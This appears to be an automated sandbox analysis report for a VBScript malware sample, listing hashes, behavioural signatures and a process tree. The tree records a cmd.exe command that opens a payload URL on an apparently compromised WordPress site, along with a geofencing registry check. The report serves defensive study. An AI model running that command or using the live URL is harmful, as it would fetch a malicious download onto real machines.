Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system -
submitted
21-04-2024 01:20
Static task
static1
Behavioral task
behavioral1
Sample
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs
Resource
win10v2004-20240412-en
General
-
Target
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs
-
Size
27KB
-
MD5
75ec9f68a5b62705c115db5119a78134
-
SHA1
6209f948992fd18d4fc6fc6f89d9815369ac8931
-
SHA256
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf
-
SHA512
82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780
-
SSDEEP
384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
WScript.exe
flow | pid | process
28 | 4528 | WScript.exe
29 | 4528 | WScript.exe
31 | 4528 | WScript.exe
35 | 4528 | WScript.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation | WScript.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
msedge.exe, msedge.exe, identity_helper.exe, msedge.exe
pid | process
2616 | msedge.exe
2616 | msedge.exe
2972 | msedge.exe
2972 | msedge.exe
4120 | identity_helper.exe
4120 | identity_helper.exe
5164 | msedge.exe
5164 | msedge.exe
5164 | msedge.exe
5164 | msedge.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exe
pid | process
2972 | msedge.exe
-
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
msedge.exe
pid | process
2972 | msedge.exe
-
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exe
pid | process
2972 | msedge.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WScript.exe, cmd.exe, explorer.exe, msedge.exe
description | pid | process | target process
PID 4528 wrote to memory of 3660 | 4528 | WScript.exe | cmd.exe
PID 3660 wrote to memory of 4224 | 3660 | cmd.exe | explorer.exe
PID 1040 wrote to memory of 2972 | 1040 | explorer.exe | msedge.exe
PID 2972 wrote to memory of 5036 | 2972 | msedge.exe | msedge.exe
PID 2972 wrote to memory of 4676 | 2972 | msedge.exe | msedge.exe
PID 2972 wrote to memory of 2616 | 2972 | msedge.exe | msedge.exe
PID 2972 wrote to memory of 2160 | 2972 | msedge.exe | msedge.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exeexplorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa1e3f46f8,0x7ffa1e3f4708,0x7ffa1e3f47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads